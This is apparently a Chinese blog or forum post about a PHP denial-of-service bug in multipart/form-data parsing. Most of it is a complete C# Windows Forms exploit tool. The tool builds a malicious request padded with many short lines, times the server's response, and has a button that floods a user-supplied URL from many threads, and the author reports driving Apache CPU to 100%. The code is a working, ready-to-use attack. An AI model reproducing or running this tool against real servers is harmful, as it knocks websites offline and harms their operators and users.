根据乌云网,百度攻防安全实验室提供的最新漏洞,存在于php各版本:
PHP解析multipart/form-data http
请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data
请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。
原文链接:http://drops.wooyun.org/papers/6077
大致是因为php解析请求时,是按行读取数据,然后每读取一行进行一次内存分配和内存拷贝,这样会耗掉n^2的时间,原文的利用方式是Python,现提供C#的代码:
对本地测试的结果,apache cpu占用100%:
代码:
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;
namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
string s = HttpPostData().ToString();
s = "响应时间:" + s;
MessageBox.Show(s);
}
private double HttpPostData()
{
string url=this.textBox1.Text;
int timeOut = 10000, lcount = int.Parse(textBox2.Text);
string responseContent;
string fileKeyName = "file";
string filePath = "58.jpg";
var memStream = new MemoryStream();
var webRequest = (HttpWebRequest)WebRequest.Create(url);
// 边界符
var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");
// 边界符
var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");
// 最后的结束符
var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");
// 设置属性
webRequest.Method = "POST";
webRequest.Timeout = timeOut;
webRequest.ContentType = "multipart/form-data; boundary=" + boundary;
// 写入文件
const string filePartHeader =
"Content-Disposition: form-data; name=\"{0}\"; filename=\"s";
var header = string.Format(filePartHeader, fileKeyName);
var headerbytes = Encoding.UTF8.GetBytes(header);
memStream.Write(beginBoundary, 0, beginBoundary.Length);
memStream.Write(headerbytes, 0, headerbytes.Length);
var buffer = new byte[2];
buffer = Encoding.UTF8.GetBytes("a\n");
int bytesRead=2; // =0
for (int i = 0; i < lcount;i++ )
memStream.Write(buffer, 0, bytesRead);
var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";
bb += boundary;
bb += "--";
var body = new byte[1024];
body=Encoding.UTF8.GetBytes(bb);
memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));
// 写入最后的结束边界符
memStream.Write(endBoundary, 0, endBoundary.Length);
webRequest.ContentLength = memStream.Length;
var requestStream = webRequest.GetRequestStream();
memStream.Position = 0;
var tempBuffer = new byte[memStream.Length];
memStream.Read(tempBuffer, 0, tempBuffer.Length);
memStream.Close();
requestStream.Write(tempBuffer, 0, tempBuffer.Length);
requestStream.Close();
DateTime d = DateTime.Now;
var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();
using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),
Encoding.GetEncoding("utf-8")))
{
responseContent = httpStreamReader.ReadToEnd();
}
httpWebResponse.Close();
webRequest.Abort();
return (DateTime.Now-d).TotalSeconds;
}
private void Attack()
{
string url = this.textBox1.Text;
int timeOut = 10000, lcount = int.Parse(textBox2.Text);
string responseContent;
string fileKeyName = "file";
string filePath = "58.jpg";
var memStream = new MemoryStream();
var webRequest = (HttpWebRequest)WebRequest.Create(url);
// 边界符
var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");
// 边界符
var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");
// 最后的结束符
var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");
// 设置属性
webRequest.Method = "POST";
webRequest.Timeout = timeOut;
webRequest.ContentType = "multipart/form-data; boundary=" + boundary;
// 写入文件
const string filePartHeader =
"Content-Disposition: form-data; name=\"{0}\"; filename=\"s";
var header = string.Format(filePartHeader, fileKeyName);
var headerbytes = Encoding.UTF8.GetBytes(header);
memStream.Write(beginBoundary, 0, beginBoundary.Length);
memStream.Write(headerbytes, 0, headerbytes.Length);
var buffer = new byte[2];
buffer = Encoding.UTF8.GetBytes("a\n");
int bytesRead = 2; // =0
for (int i = 0; i < lcount; i++)
memStream.Write(buffer, 0, bytesRead);
var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";
bb += boundary;
bb += "--";
var body = new byte[1024];
body = Encoding.UTF8.GetBytes(bb);
memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));
// 写入最后的结束边界符
memStream.Write(endBoundary, 0, endBoundary.Length);
webRequest.ContentLength = memStream.Length;
var requestStream = webRequest.GetRequestStream();
memStream.Position = 0;
var tempBuffer = new byte[memStream.Length];
memStream.Read(tempBuffer, 0, tempBuffer.Length);
memStream.Close();
requestStream.Write(tempBuffer, 0, tempBuffer.Length);
requestStream.Close();
DateTime d = DateTime.Now;
var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();
using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),
Encoding.GetEncoding("utf-8")))
{
responseContent = httpStreamReader.ReadToEnd();
}
httpWebResponse.Close();
webRequest.Abort();
}
private void button2_Click(object sender, EventArgs e)
{
int n = int.Parse(textBox3.Text);
for(int i=0;i<n;i++)
{
new Thread(Attack).Start();
}
}
}
}